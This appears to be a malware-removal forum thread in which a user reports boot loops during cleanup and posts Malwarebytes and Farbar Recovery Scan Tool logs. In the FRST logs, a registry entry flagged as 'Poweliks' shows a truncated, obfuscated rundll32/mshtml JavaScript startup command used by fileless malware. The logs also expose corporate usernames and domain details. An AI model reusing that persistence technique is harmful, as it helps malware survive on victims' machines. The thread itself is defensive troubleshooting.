
plaggard

  1. Hey MrC, in the middle of the MalwareBytes threat scan my computer restarted unexpectedly and now I am in an endless "Startup Repair" loop. The OS will not load and the installation disc's repair utilities will not repair the computer. It won't even restore from any of my previous restore points. The best I can do is run command prompt from the disc. Unless you have advice for this situation, I'm going to have to get this sorted out before we continue...
  2. Sorry, I followed your initial instruction and restarted it. Got the black screen again and did a restore. Then restarted again and the login screen came up just fine...
  3. No need to apologize! It was probably my fault some way or another. Here's the new Fixlog. Should I restart the computer like it's asking me to? Fixlog.txt
  4. I had to restore to a point from yesterday because the one from today had that file in it and brought me right back to the BkSOD... So now I'm back to yesterday.
  5. That is the case. Restarting has brought me to the black screen of death. I'll reboot and do a system restore now (just created one a few minutes ago).
  6. Malwarebytes Anti-Malware
     www.malwarebytes.org
     Scan Date: 11/4/2014
     Scan Time: 10:08:31 AM
     Logfile: MBAMlog.txt
     Administrator: Yes
     Version: 2.00.3.1025
     Malware Database: v2014.11.04.03
     Rootkit Database: v2014.11.01.02
     License: Free
     Malware Protection: Disabled
     Malicious Website Protection: Disabled
     Self-protection: Disabled
     OS: Windows 7 Service Pack 1
     CPU: x64
     File System: NTFS
     User: bcostello
     Scan Type: Threat Scan
     Result: Completed
     Objects Scanned: 559493
     Time Elapsed: 5 min, 42 sec
     Memory: Enabled
     Startup: Enabled
     Filesystem: Enabled
     Archives: Enabled
     Rootkits: Disabled
     Heuristics: Enabled
     PUP: Enabled
     PUM: Enabled
     Processes: 0 (No malicious items detected)
     Modules: 0 (No malicious items detected)
     Registry Keys: 0 (No malicious items detected)
     Registry Values: 0 (No malicious items detected)
     Registry Data: 0 (No malicious items detected)
     Folders: 0 (No malicious items detected)
     Files: 0 (No malicious items detected)
     Physical Sectors: 0 (No malicious items detected)
     (end)
  7. Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
     Ran by bcostello at 2014-11-04 10:01:38
     Running from C:\Users\rbecker\Desktop
     Boot Mode: Normal
     ==========================================================
     ==================== Security Center ========================
     (If an entry is included in the fixlist, it will be removed.)
     AV: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
     AS: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
     AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
     ==================== Installed Programs ======================
     (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
     ==================== Custom CLSID (selected items): ==========================
     (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
     CustomCLSID: HKU\S-1-5-21-1619941995-4271792153-444280415-1167_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
     ==================== Restore Points =========================
     31-10-2014 21:31:22 Windows Update
     03-11-2014 20:03:36 Windows Update
     03-11-2014 20:04:07 Windows Update
     03-11-2014 20:05:33 Windows Update
     ==================== Hosts content: ==========================
     (If needed Hosts: directive could be included in the fixlist to reset Hosts.)
     2009-07-13 21:34 - 2014-11-03 14:48 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
     127.0.0.1 localhost
     ==================== Scheduled Tasks (whitelisted) =============
     (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
     Task: {0A562D10-42B3-4B37-8DD8-F826ADD2CD0F} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1245 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1245" "$(Arg0)"
     Task: {1BF18B5B-38B8-4F14-A944-1C521D9431B4} - System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation)
     Task: {26F13908-B242-4EDE-8244-B202FC3A196E} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1265 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1265" "$(Arg0)"
     Task: {2F223DDA-408A-4FF7-B091-A4F4BC686A23} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1003 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1003" "$(Arg0)"
     Task: {34413358-051F-42CA-BB6F-0B7E492A084C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1000 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1000" "$(Arg0)"
     Task: {39129A2A-0E8E-4DEE-AFD2-C2C396CC5558} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1429 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1429" "$(Arg0)"
     Task: {6401F1FD-7EE1-4874-8C33-2A32FD019610} - System32\Tasks\WSCEAA => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\RemoteManagement\WSCEAA.exe [2012-10-17] (Wave Systems Corp.)
     Task: {7C98D515-88D0-48B0-9BBC-571271F39C98} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1244 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1244" "$(Arg0)"
     Task: {937498CF-F3C6-42F0-95A3-2C0FEBB7B492} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
     Task: {952F0C0C-CAE5-4A9F-8511-841E2A5C5E14} - System32\Tasks\NIUpdateServiceCheckTask => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [2012-11-16] (National Instruments)
     Task: {A4AC7ECA-B910-42F4-BA10-263A0104BFA0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
     Task: {AD332114-26E0-4546-8872-302B310DA61C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1246 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1246" "$(Arg0)"
     Task: {BA0DEFBB-D99E-4EA3-A5EF-A85921CBC8AE} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1247 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1247" "$(Arg0)"
     Task: {C6D0C48E-F99E-4C1A-9747-9225A41CD745} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation)
     Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
     Task: C:\Windows\Tasks\Defrag.job => C:\Windows\system32\Defrag.exe
     ==================== Loaded Modules (whitelisted) =============
     2010-01-20 06:49 - 2010-01-20 06:49 - 00027648 _____ () C:\Windows\System32\sdo2ml6.dll
     2013-01-24 11:07 - 2013-01-24 11:07 - 00824832 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\sdo2mdu.dll
     2014-06-03 08:34 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
     2012-11-20 07:52 - 2012-11-20 07:52 - 00225720 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
     2012-11-20 07:51 - 2012-11-20 07:51 - 00038840 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\DeviceStatus.dll
     2012-11-23 17:34 - 2012-11-23 17:34 - 00020480 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe
     2013-02-20 17:07 - 2013-10-28 18:38 - 00097568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
     2014-10-21 09:33 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
     2014-01-15 09:33 - 2014-01-15 09:33 - 00293376 _____ () C:\Windows\system32\CHookExt.dll
     2013-02-20 16:56 - 2012-02-01 16:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
     2013-01-28 12:08 - 2013-01-28 12:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
     2013-01-28 12:08 - 2013-01-28 12:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
     2013-09-10 09:26 - 2013-09-10 09:26 - 02214912 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtCore_2012.dll
     2013-09-10 09:26 - 2013-09-10 09:26 - 08044544 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtGui_2012.dll
     2012-01-26 08:36 - 2012-01-26 08:36 - 00278528 ____R () C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\xerces-depdom_2_6.dll
     2013-05-29 11:36 - 2013-05-29 11:36 - 01958560 _____ () C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\niwsrp.dll
     2014-09-24 22:12 - 2014-09-24 22:12 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
     2013-09-11 00:34 - 2014-10-27 21:01 - 03649648 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
     ==================== Alternate Data Streams (whitelisted) =========
     (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
     ==================== Safe Mode (whitelisted) ===================
     (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
     HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
     HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
     ==================== EXE Association (whitelisted) =============
     (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
     ==================== MSCONFIG/TASK MANAGER disabled items =========
     (Currently there is no automatic fix for this section.)
     MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk => C:\Windows\pss\Audible Download Manager.lnk.CommonStartup
     MSCONFIG\startupreg: 1135n Scan2PC => "C:\Windows\twain_32\Dell\Dell1135\Scan2Pc.exe"
     MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
     MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
     MSCONFIG\startupreg: TdmNotify => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
     ========================= Accounts: ==========================
     Administrator (S-1-5-21-2032665127-3746338806-4175205368-500 - Administrator - Disabled)
     Guest (S-1-5-21-2032665127-3746338806-4175205368-501 - Limited - Disabled)
     UpdatusUser (S-1-5-21-2032665127-3746338806-4175205368-1000 - Limited - Enabled) => C:\Users\UpdatusUser
     ==================== Faulty Device Manager Devices =============
     Name: Control Vault w/ Fingerprint Swipe Sensor
     Description: Control Vault w/ Fingerprint Swipe Sensor
     Class Guid: {53d29ef7-377c-4d14-864b-eb3a85769359}
     Manufacturer: Broadcom Corporation
     Service: WUDFRd
     Problem: : Windows has stopped this device because it has reported problems.
(Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. Name: Broadcom Usbccid Smartcard Reader (WUDF) Description: Broadcom Usbccid Smartcard Reader (WUDF) Class Guid: {50dd5230-ba8a-11d1-bf5d-0000f805f530} Manufacturer: Broadcom Service: WUDFRd Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. ==================== Event log errors: ========================= Application errors: ================== Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: ) Description: The Windows logon process has unexpectedly terminated. 
Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_RpcEptMapper, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: rpcss.dll, version: 6.1.7601.17514, time stamp: 0x4ce7c970
Exception code: 0xc0000005
Fault offset: 0x00000000000646ac
Faulting process id: 0x3cc
Faulting application start time: 0xsvchost.exe_RpcEptMapper0
Faulting application path: svchost.exe_RpcEptMapper1
Faulting module path: svchost.exe_RpcEptMapper2
Report Id: svchost.exe_RpcEptMapper3
Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 50279
Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 50279
Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998
Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998
Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4134
System errors:
=============
Error: (11/04/2014 09:43:14 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (11/04/2014 09:42:43 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: ADC1104)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
Error: (11/04/2014 09:23:58 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: The handle is invalid.Broadcom Corp Contacted SmartCard 0GET_STATEXX XX XX XX
Error: (11/04/2014 09:08:35 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WvPCR service depends on the TPM Base Services service which failed to start because of the following error: %%0
Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The SI TSS v1.2.1.41 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0
Error: (11/04/2014 09:08:07 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain controller in domain ADC1104 due to the following: %%1311 This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator. ADDITIONAL INFO If this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.
Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Remote Procedure Call (RPC) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Reboot the machine.
Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The RPC Endpoint Mapper service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
Error: (11/04/2014 09:00:01 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\adc.com\SysVol\adc.com\Policies\{97A64E57-5354-4D99-8398-66406F78FA5A}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following: a) Name Resolution/Network Connectivity to the current domain controller. b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller). c) The Distributed File System (DFS) client has been disabled.
Microsoft Office Sessions:
=========================
Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: )
Description:
Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe_RpcEptMapper6.1.7600.163854a5bc3c1rpcss.dll6.1.7601.175144ce7c970c000000500000000000646ac3cc01cff7ae99170b7eC:\Windows\system32\svchost.exec:\windows\system32\rpcss.dll6e65f048-642b-11e4-a9a8-b8ca3ad1aa18
Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 50279
Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 50279
Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998
Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998
Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4134
==================== Memory info ===========================
Processor: Intel® Core i5-3320M CPU @ 2.60GHz
Percentage of memory in use: 70%
Total physical RAM: 6015.18 MB
Available physical RAM: 1766.91 MB
Total Pagefile: 12028.55 MB
Available Pagefile: 7572.97 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:118.46 GB) (Free:49.89 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 119.2 GB) (Disk ID: D7B04F5B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=752 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=118.5 GB) - (Type=07 NTFS)
==================== End Of Log ============================
  8. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by bcostello (administrator) on ADC69 on 04-11-2014 10:01:11
Running from C:\Users\rbecker\Desktop
Loaded Profiles: rbecker & bcostello & UpdatusUser (Available profiles: rbecker & kmitchell & bcostello & Administrator & UpdatusUser)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe
(Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(National Instruments Corporation) C:\Windows\SysWOW64\lkads.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\MAX\nimxs.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVCM.EXE
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe
(O2Micro International) C:\Windows\System32\o2flash.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer_Service.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(National Instruments, Inc.) C:\Windows\SysWOW64\lkcitdl.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(National Instruments Corporation) C:\Windows\SysWOW64\lktsrv.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Authentec Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Creative Technology Ltd) C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Nikon Corporation) C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [682904 2012-09-19] (Alps Electric Co., Ltd.)
HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-02-13] (IDT, Inc.)
HKLM\...\Run: [intelPROSet] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [4805936 2012-08-23] (Intel® Corporation)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2916584 2010-08-12] (ESET)
HKLM\...\Run: [Conisio Login Manager] => C:\Program Files\SolidWorks Enterprise PDM\EdmServer.exe [1614336 2014-01-15] (Dassault Systemes SolidWorks Corp.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [462974 2011-12-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [38984 2013-05-10] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840768 2013-05-10] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [571392 2011-10-30] (Nikon Corporation)
HKLM-x32\...\Run: [NI Update Service] => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [853640 2012-11-16] (National Instruments)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (Authentec Inc.)
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...\MountPoints2: {c8e9ef48-7ba9-11e2-8a3a-806e6f6e6963} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\contents_TGSG2\setup.htm
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-1619941995-4271792153-444280415-3256\...\Run: [NIRegistrationWizard] => C:\Program Files (x86)\National Instruments\Shared\RegistrationWizard\Bin\RegistrationWizard.exe [846520 2010-06-21] ()
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [184048 2013-12-04] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [156256 2013-12-04] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NI Error Reporting.lnk
ShortcutTarget: NI Error Reporting.lnk -> C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe (National Instruments Corporation)
Startup: C:\Users\kmitchell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
